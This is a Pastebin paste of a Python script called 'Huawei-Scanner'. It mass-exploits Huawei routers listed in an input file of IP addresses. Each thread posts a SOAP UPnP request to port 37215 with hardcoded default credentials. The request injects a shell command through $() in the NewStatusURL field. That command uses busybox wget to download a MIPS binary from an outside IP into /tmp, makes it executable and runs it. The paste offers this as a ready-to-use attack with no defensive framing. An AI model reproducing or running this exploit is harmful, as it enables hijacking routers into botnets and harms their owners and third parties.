ZucoCheezy

Huawei-Scanner

Nov 30th, 2018
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.63 KB | None | 0 0
  1. #! python !#
  2. import sys, socket, time, struct, threading, requests
  3. from multiprocessing import Process
  4. from Queue import *
  5. from threading import Thread
  6. from requests.auth import HTTPDigestAuth
  7.  
  8. # 0day for Huawei found by Nexus Zeta!
  9.  
  10. ips = open(sys.argv[1], "r").readlines()
  11. queue = Queue()
  12. queue_count = 0
  13. cmd = "busybox wget -g 198.7.59.177 -l /tmp/rsh -r /bins/mips ;chmod +x /tmp/rsh ;/tmp/rsh"
  14. payload2 = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
  15.  
  16. def rtek(host):
  17.     try:
  18.         url = "http://" + host + ":37215/ctrlt/DeviceUpgrade_1"
  19.         requests.post(url, data=payload2, auth=HTTPDigestAuth('dslf-config', 'admin'))
  20.     except:
  21.         pass
  22.     return
  23.  
  24. def main():
  25.     global queue_count
  26.     for line in ips:
  27.         line = line.strip("\r")
  28.         line = line.strip("\n")
  29.         queue_count += 1
  30.         sys.stdout.write("\r[%d] Added to queue" % (queue_count))
  31.         sys.stdout.flush()
  32.         queue.put(line)
  33.     sys.stdout.write("\n")
  34.     i = 0
  35.     while i != queue_count:
  36.         i += 1
  37.         try:
  38.             input = queue.get()
  39.             thread = Thread(target=rtek, args=(input,))
  40.             thread.start()
  41.         except KeyboardInterrupt:
  42.             sys.exit("Interrupted? (ctrl + c)")
  43.     thread.join()
  44.     return
  45.  
  46. if __name__ == "__main__":
  47.     main()
Add Comment
Please, Sign In to add comment